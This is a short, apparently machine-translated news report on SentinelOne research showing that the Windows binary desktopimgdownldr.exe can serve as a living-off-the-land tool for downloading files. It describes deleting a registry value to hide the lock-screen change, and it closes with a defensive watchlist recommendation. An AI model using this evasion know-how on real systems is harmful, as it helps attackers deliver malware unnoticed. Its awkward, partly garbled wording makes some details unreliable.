Malicious agents often use such binaries, known as living-off-the-land binaries (LoLBins), to carry out illegal activities.
With LoLBins, a hacker can download and install malware and avoid detecting a device's security (UAC ή WDAC).
Cisco Talos released a list last year, with 13 native executables Windows which can be used by intruders to download and execute malware:
Its security researchers SentinelOne, discovered that the “desktopimgdownldr.exe", Located in the folder system32 of Windows 10, can also serve as LoLBin.
Executable is part of it CSP personalization (configuration service provider) that allows, among other things, the definition of lock screen and desktop background images.
Both for the desktop background and for the lock screen, the tool accepts JPG, JPEG, PNG files stored locally or remotely (supports UTL HTTP / S addresses).
According to the researcher Gal Kristal of SentinelOne, the execution of desktopimgdownldr.exe with administrator rights, bypasses the one specified by user lock screen image, thus warning him that something is wrong.
This can be avoided, however, if the intruder delete the registry value immediately after running the binary, without the user suspecting the slightest thing, and thus be able to proceed with the execution of the malware.
Kristal found that while executable seems to require high rights, it can create files on C: \ Windows and in the registry, it can also be run with the rights of a standard user, to download files from an external source.
Kristal says, however, that a user could rectify the situation. Recommends to those who use programs Endpoint Detection and Response add "desktopimgdownldr.exe" to watchlists so they can detect and address it.